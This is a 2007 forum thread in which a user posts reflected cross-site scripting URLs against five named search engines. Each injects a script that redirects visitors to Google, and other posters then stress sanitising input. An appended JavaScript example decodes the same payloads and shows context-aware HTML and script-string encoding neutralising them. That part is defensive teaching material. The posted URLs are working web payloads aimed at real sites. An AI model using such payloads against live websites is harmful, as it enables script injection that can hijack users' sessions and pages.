Topic: Google taking over other search engines! (aka fun with XSS) (Page 1 of 1)

 
wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

posted 06-12-2007 17:11

Brainboost:
http://www.brainboost.com/search.asp?Q=%22%3C/title%3E%3Cscript%3Edocument.location='http://www.google.com'</script>
Lycos:
http://search.lycos.com/?query=%3C%2Ftitle%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.google.com%27%3C%2Fscript%3E&x=31&y=11
Hotbot:
http://www.hotbot.com/?nil_suggest=btn&ps=&loc=searchbox&tab=web&mode=search&currProv=ask&query=%3C%2Ftitle%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.google.com%27%3C%2Fscript%3E
Ask:
http://uk.ask.com/web?q=a&search=search&dm=all&qsrc=0&o=312&l=dir&jss=%22%3E%3C/a%3E%3Cscript%3Edocument.location='http://www.google.com'%3C/script%3E
Chacha:
http://search.chacha.com/search/query?query=%22%3Bdocument.location%3D%22http%3A%2F%2Fwww.google.com

all googlicised!

Wrayal

Tyberius Prime
Maniac (V) Mad Scientist with Finglongers

From: Germany
Insane since: Sep 2001

posted 06-13-2007 00:12

br... you'd think they'd at least sanitize their input somewhat.

poi
Paranoid (IV) Inmate

From: Norway
Insane since: Jun 2002

posted 06-13-2007 01:10

Why would they? User input is always clean and well intended.

wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

posted 06-13-2007 01:12

Poi: Seriously? I agree XSS looks harmless at first, but what (say) if you found a similar flaw in the search function for gmail.google.com and formed a carefully crafted link there? These are only fun but...meh...

poi
Paranoid (IV) Inmate

From: Norway
Insane since: Jun 2002

posted 06-13-2007 01:42

No. I was kidding. Of course input, any input, MUST be sanitized.

At work, people get slammed whenever they don't sanitize user or 3rd party input. Seriously. And our QA people can come up with really sneaky ways to inject script and have us fix our code.

wrayal
Bipolar (III) Inmate

From: Cranleigh, Surrey, England
Insane since: May 2003

posted 06-13-2007 01:45

Oh hehe, ok. Sorry, I misread it as serious. I was sad to find out that the only one that had taken any effort (ask) was already in MOSEB =(
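
Added example, not part of the thread or any of the named sites' code: the query values from the first post, decoded, rendered into three output contexts with and without context-aware encoding. The page fragments in `render` and the variable name `lastQuery` are assumptions made for illustration.

```javascript
// Constructed inputs: query values from the first post's URLs, percent-decoded
// the way a server sees them (Lycos, Ask and Chacha respectively).
const titlePayload = decodeURIComponent(
  "%3C%2Ftitle%3E%3Cscript%3Edocument.location%3D%27http%3A%2F%2Fwww.google.com%27%3C%2Fscript%3E");
const attrPayload = decodeURIComponent(
  "%22%3E%3C/a%3E%3Cscript%3Edocument.location='http://www.google.com'%3C/script%3E");
const jsPayload = decodeURIComponent(
  "%22%3Bdocument.location%3D%22http%3A%2F%2Fwww.google.com");

// Encoder for HTML text nodes and quoted attribute values.
function escapeHtml(s) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#39;" };
  return String(s).replace(/[&<>"']/g, (c) => map[c]);
}

// Encoder for a value emitted as a JavaScript string literal in an inline
// <script>. HTML entities are not decoded there, so it needs its own encoder:
// JSON.stringify escapes quotes and backslashes, and the extra pass keeps
// "</script>" and "<!--" from ending or confusing the script block.
function escapeJsString(s) {
  return JSON.stringify(String(s)).replace(/[<>&\u2028\u2029]/g,
    (c) => "\\u" + c.charCodeAt(0).toString(16).padStart(4, "0"));
}

// Hypothetical results-page fragments that echo the query in three contexts.
function render(q, encode) {
  const html = encode ? escapeHtml : (s) => s;
  const js = encode ? escapeJsString : (s) => '"' + s + '"';
  return {
    title: `<title>${html(q)} - search</title>`,
    attr: `<input name="q" value="${html(q)}">`,
    script: `<script>var lastQuery = ${js(q)};</script>`,
  };
}

// Print the raw and encoded output for each payload in the context it targets.
for (const [ctx, q] of [["title", titlePayload], ["attr", attrPayload], ["script", jsPayload]]) {
  console.log(ctx, "raw:    ", render(q, false)[ctx]);
  console.log(ctx, "encoded:", render(q, true)[ctx]);
}
```

The Chacha-style value contains no angle brackets at all, which is why HTML escaping alone does not cover a query echoed inside an inline script.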


